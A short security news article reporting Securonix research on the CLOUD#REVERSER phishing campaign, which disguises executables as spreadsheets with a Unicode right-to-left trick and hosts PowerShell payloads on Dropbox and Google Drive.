Top Cloud Storage Platforms Hijacked to Host Malware: Make Sure Google Drive or Dropbox Link is Safe
A new hacking campaign has been discovered where the attackers abuse legitimate cloud storage services to host malicious payloads.
In a research reportSecuronix said the campaign starts with a phishing email containing a .ZIP archive. When the archive is unzipped, it produces an executable file that looks like an Excel file. The file uses a hidden Unicode character (RLO) from left to right, reversing the order of the following characters.
So instead of seeing the filename as “RFQ-101432620247fl*U+202E*xslx.exe,” victims see “RFQ-101432620247flexe.xlsx” and can be tricked into thinking they are opening a spreadsheet file.
Abuse of the cloud
The .ZIP archive comes with a few additional scripts to make the entire campaign seem more authentic, but the main .exe file will trigger a multi-stage deployment action that concludes with two PowerShell scripts hosted on Dropbox and Google Drive.
“The final-stage PowerShell script zz.ps1 has functionality to download files from Google Drive based on specific criteria and save them to a specified path on the local system in the ProgramData folder,” the researchers said.
This isn’t the first time hackers have abused cloud services to host malware or run malicious campaigns in general.
For example, Google Docs, Google’s cloud-based word processor, has the ability to share files with other people via email, using Google’s infrastructure. Hackers exploited this fact to bypass spam protection and deliver malicious emails straight to people’s inboxes. Other services, such as DocuSign, Sharepoint, GitHub and many others.
In fact, according to Netskope’s report published two years ago, cloud applications were the largest distributor of malware in 2021.
Securonix called this latest campaign CLOUD#REVERSER. We don’t know how many victims it affects.
Through The hacker news